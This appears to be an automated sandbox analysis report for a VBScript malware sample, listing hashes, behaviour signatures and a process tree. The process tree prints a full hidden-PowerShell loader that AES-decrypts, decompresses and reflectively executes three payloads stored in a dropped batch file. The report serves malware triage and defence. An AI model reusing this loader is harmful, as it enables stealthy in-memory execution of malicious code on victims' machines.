Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
03-07-2024 20:01
General
-
Target
wild2.vbs
-
Size
136KB
-
MD5
2fc8fa386eac2b756ca56d6c5ea5972a
-
SHA1
5e8701a6f9ff44f141f14e43a6b612b82b23aeb1
-
SHA256
e28bdb40c41bbadef5a3413c02773f291db42e0523c7aa6d4f93a03b3aa7959a
-
SHA512
531876ffe3a10729b60dbb45161bb6e73e14be00d174aedb0afcc4689c57e9f8b5cc147eefb25f002f62540c0748c0fb183bea3d90f525a7f688bf8ef3c9894a
-
SSDEEP
3072:UUtmc9S9K7G4yC0oab3a1adGNRLfE28rHRq8QDEQ0SkhbPxFIWW:UUwT4ygabaEGNRHkHDQDD0NRW
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
101KB
MD5e770f53921bca6b9d02faf3e70059249
SHA1fb04530ec135f2a34afd3bdf0c205193418812b6
SHA256be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1
SHA512f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
512KB